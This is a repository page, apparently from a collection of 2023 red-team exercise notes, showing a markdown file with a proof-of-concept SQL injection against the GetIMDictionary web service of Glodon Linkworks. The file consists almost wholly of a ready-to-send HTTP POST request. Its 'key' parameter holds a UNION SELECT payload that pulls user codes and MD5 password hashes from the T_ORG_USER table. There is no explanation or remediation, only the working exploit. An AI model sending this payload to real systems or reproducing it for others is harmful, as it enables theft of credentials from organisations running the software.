admin/2023Hvv
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
2023Hvv/广联达 Linkworks GetIMDictionarySQL 注入漏洞.md
ibaiw e362917283 add
2023-08-13 14:27:10 +08:00

11 lines
222 B
Markdown
Raw Blame History

POC:
```
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
```
Reference in New Issue View Git Blame Copy Permalink